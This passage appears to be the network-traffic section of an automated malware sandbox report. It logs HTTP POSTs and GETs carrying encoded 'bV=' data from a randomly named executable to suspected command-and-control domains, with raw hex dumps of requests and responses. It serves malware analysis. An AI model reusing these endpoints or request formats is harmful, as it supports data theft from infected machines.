                                                                                                                  Data Ascii: bV=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0IrK8d0Zm1+3XZsSJ479J63XP32smBY/lYtLq6Z
                                                                                                                  Dec 2, 2024 15:24:45.641560078 CET738INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.54991446.30.211.3880728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:47.027004004 CET1802OUTPOST /uf7y/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  Origin: http://www.bankseedz.info
                                                                                                                  Referer: http://www.bankseedz.info/uf7y/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 6c 52 59 6e 55 33 48 33 55 77 48 33 69 51 75 49 39 39 55 49 57 6b 53 77 33 52 45 56 4f 51 69 30 5a 2b 6c 65 34 6a 6e 6d 46 67 58 71 6a 55 35 45 73 57 59 47 6c 5a 71 38 2f 2f 4b 69 77 4c 4a 79 45 68 4e 33 74 6e 66 36 68 61 56 35 69 6f 4f 45 44 42 72 2f 51 46 61 46 75 6c 41 42 58 37 6e 4e 31 44 69 68 4d 4a 59 4a 2f 68 4d 38 53 74 75 30 6c 31 58 4d 39 41 63 62 37 78 6c 56 71 4b 77 53 79 51 41 41 48 2b 55 47 46 47 56 77 47 6a 70 50 4c 4e 74 77 53 31 53 72 57 39 56 78 48 74 76 66 76 54 42 59 36 78 [TRUNCATED]
                                                                                                                  Data Ascii: bV=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdlRYnU3H3UwH3iQuI99UIWkSw3REVOQi0Z+le4jnmFgXqjU5EsWYGlZq8//KiwLJyEhN3tnf6haV5ioOEDBr/QFaFulABX7nN1DihMJYJ/hM8Stu0l1XM9Acb7xlVqKwSyQAAH+UGFGVwGjpPLNtwS1SrW9VxHtvfvTBY6xNgcttLBL8xLG603fXodgUKC0DwuAKyXKBnl1vH6xhzAkozRC1vad5qFmgBZYVU3/Bfd29FEoToXxLknkPeiC/FTQvZVaAAy23r0lKbr1NWJq+2ZAdAtZ3b8YZ3taJrt6eSw/1k7mdQg/NqE1fMXGKRk616+UexWiILeF/xzf3pVP9Q4bunuTgPv1mst3sT728vJB1YGwWyVtnHSpRHwsKyD7Ll5FDJK8QFkrVYSo8LXSuNMT1CVZEr0FsaG/+2G2eccZCUbKcDXmWS4bf92xvYEJvZhsFqhszTh+xq4WinpDGJqrWHODD5PLS1qTBvubsP2GGaPPhRQu1M6Dpgt9jRCVe56L5KgbFeyzbmXwvWoDf+/EJcqE7QablO50vy6MKSvgPtvubwlhKCOaBBY4p+STTCvb9jX5VkJYLJHFadRDf1qvS7ZvU1FIBwL2RjP02ReumDvZyHGoNkpAlMT82CxXeiYA4wp9R5lcmKIBk0/x4cnnKFKS7OVQB5NbUqf5D6aoCRQQe0hvS8mpCsIsHwqb2I6HdfhkOCA24RIQ/M+RAXnODvKoygKLEKaIU6P58F6D9ajQUvo+q6fRZxA0pVsVP79rwUjya0G8a9IX5zeX6QanpI8C6dRj5cL7Q9rmJXZwGYYbMPXRL5fUNig3GDaspxP23cAvaq [TRUNCATED]
                                                                                                                  Dec 2, 2024 15:24:48.311336040 CET738INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.54992046.30.211.3880728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:49.683216095 CET499OUTGET /uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:24:50.989335060 CET738INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.549936103.224.182.24280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:56.919828892 CET753OUTPOST /3iym/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.madhf.tech
                                                                                                                  Origin: http://www.madhf.tech
                                                                                                                  Referer: http://www.madhf.tech/3iym/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 74 6e 31 76 34 4d 78 4e 43 31 50 64 73 73 56 44 38 72 63 39 2b 6c 64 5a 45 31 6a 6a 61 76 4e 58 31 54 2b 6c 74 75 73 3d
                                                                                                                  Data Ascii: bV=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3Rtn1v4MxNC1PdssVD8rc9+ldZE1jjavNX1T+ltus=
                                                                                                                  Dec 2, 2024 15:24:58.149471045 CET871INHTTP/1.1 200 OK
                                                                                                                  date: Mon, 02 Dec 2024 14:24:57 GMT
                                                                                                                  server: Apache
                                                                                                                  set-cookie: __tad=1733149497.5221456; expires=Thu, 30-Nov-2034 14:24:57 GMT; Max-Age=315360000
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-encoding: gzip
                                                                                                                  content-length: 576
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  connection: close
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                  Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.549942103.224.182.24280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:59.584525108 CET773OUTPOST /3iym/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.madhf.tech
                                                                                                                  Origin: http://www.madhf.tech
                                                                                                                  Referer: http://www.madhf.tech/3iym/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 78 68 55 6d 72 55 4c 66 73 2b 76 77 75 56 7a 35 34 46 73 41 33 31 30 69 47 4e 38 37 42 36 49 2b 65 6c 54 4e 2f 58
                                                                                                                  Data Ascii: bV=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFxhUmrULfs+vwuVz54FsA310iGN87B6I+elTN/X
                                                                                                                  Dec 2, 2024 15:25:00.822520971 CET871INHTTP/1.1 200 OK
                                                                                                                  date: Mon, 02 Dec 2024 14:25:00 GMT
                                                                                                                  server: Apache
                                                                                                                  set-cookie: __tad=1733149500.1835738; expires=Thu, 30-Nov-2034 14:25:00 GMT; Max-Age=315360000
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-encoding: gzip
                                                                                                                  content-length: 576
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  connection: close
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                                  Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.549948103.224.182.24280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:02.252502918 CET1790OUTPOST /3iym/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.madhf.tech
                                                                                                                  Origin: http://www.madhf.tech
                                                                                                                  Referer: http://www.madhf.tech/3iym/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 57 71 6e 6c 2b 34 7a 31 49 4a 4c 2f 54 56 33 59 78 53 35 53 70 59 39 76 68 75 6b 37 62 52 6e 6c 42 72 62 2b 31 79 57 36 4b 6b 4e 64 59 76 2f 65 70 48 5a 5a 41 2f 64 46 56 4f 2b 49 35 6c 4d 42 69 4d 6e 54 2f 39 56 46 47 4e 5a 42 53 67 54 51 69 46 67 48 4e 68 62 33 4d 4a 33 4b 6c 38 6b 42 33 68 5a 63 76 6d 4d 63 33 44 31 77 6e 65 2b 6f 39 76 34 73 44 54 72 49 35 69 32 6d 75 30 68 56 55 6e 67 57 36 62 57 4a 6f 5a 48 55 79 46 72 57 6b 51 38 78 33 79 7a 62 61 32 75 44 76 35 30 6a 2f 47 72 2b 50 6b [TRUNCATED]
                                                                                                                  Data Ascii: bV=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2Hit4wPwe1nZG/S4ycvBjAb1fH4c7YdH1xyo2zm+xlp0y5qb3k05tmGSawQzJhgizSGN0/c+BzOrNYEyu1ejkmx4jp3dYnyFsPjAOQRyZABLuY0EGqxDYTQ4CkhH9b8tU6VWqnl+4z1IJL/TV3YxS5SpY9vhuk7bRnlBrb+1yW6KkNdYv/epHZZA/dFVO+I5lMBiMnT/9VFGNZBSgTQiFgHNhb3MJ3Kl8kB3hZcvmMc3D1wne+o9v4sDTrI5i2mu0hVUngW6bWJoZHUyFrWkQ8x3yzba2uDv50j/Gr+Pk7Ycbl7yd7CVcsXByUWzF+PNW9aHHbcYNKAuShJpWEBJguHxZW9YKWDUwNcDsVSCfY6yjddjfd+AjB8RUD0zjuQqOWAHq7DMAjpxH0xiYM6rLXykIXxHKRDXRDUS5sYqbc2e6aeC9zu2tROt4Tn+P7q2kpixsuISrXMMXs8kre/XPNVyiWWl6aqJvLGu0sxOQWOfupZ7kAq0LZJXYnBBDDqZkqnqtaFw2b01y3Na7+4YDxF1c8M+8m5OQRfKMV5HeYDeCzJJWe4YOgOYQrMX09trI5lNwy27KgHxiJAyVqYtr0pztRa1/p6CxB4VsSsL/ikknFPqoHYJ2q3BDo53J3NSpL5cPGNaSlXB1O4Jb/7eNg7K1WKvH551VjqiTEnDp8CAvxJ0O9O8Vqe4iGWgvxVCM8XZPQr6/Kw3Qe7+4ffSRpejiJ6/czGWeYBUH00Z0Wlppde3PnzSpm625mnb1s8hltik0dve6XSKQdoAFqah+jiVUWx/ivNjyYxf/tjx7Ait88ooSkx9Ro2LQeGqqroCNA0L4i+BQw1hNxL8yHhizTW9aiPrdQ5On8NkpS3SjL+QiRk/N2bMR9/vO+FQEkqZX0tUmvT52F9fcOGi0nquEGbiYwpKsA8LcDGYCkj7dai35B+6HCr/EXjO88kDpUWnefTTs4F3ltx [TRUNCATED]
                                                                                                                  Dec 2, 2024 15:25:03.546399117 CET871INHTTP/1.1 200 OK
                                                                                                                  date: Mon, 02 Dec 2024 14:25:03 GMT
                                                                                                                  server: Apache
                                                                                                                  set-cookie: __tad=1733149503.5138422; expires=Thu, 30-Nov-2034 14:25:03 GMT; Max-Age=315360000
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-encoding: gzip
                                                                                                                  content-length: 576
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  connection: close
